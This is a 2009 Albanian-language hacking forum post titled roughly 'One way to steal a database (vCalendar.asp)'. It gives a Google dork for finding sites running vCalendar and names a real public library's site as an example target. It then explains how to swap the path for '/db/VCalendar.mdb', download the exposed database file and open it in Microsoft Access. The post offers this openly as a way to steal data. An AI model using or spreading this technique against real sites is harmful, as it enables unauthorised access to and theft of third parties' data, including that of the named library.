Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 1 Menyr me vjedh Databaze ( vCalendar.asp)

Shko poshtë 
AutoriMesazh
pr0xy g33k
V.I.P
V.I.P
pr0xy g33k

Numri i postimeve : 85
Poenat e Antarit : 243
Thanks : 1
Join date : 26/06/2009
Age : 22
Location : macedonian

MesazhTitulli: 1 Menyr me vjedh Databaze ( vCalendar.asp)   Sun Jun 28, 2009 12:16 am

google.com

Dork : "inurl:vcalendar_asp"

www.wilmington.lib.oh.us/vcalendar_asp/

Ja shlyjm vcalendar_asp

ja shtojm kete

/db/VCalendar.mdb

dhe na qet me ru databasen e marrim dhe database hapet me

Microsoft Office Acces

met mira besoj qe e kuptuhet
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
1 Menyr me vjedh Databaze ( vCalendar.asp)
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: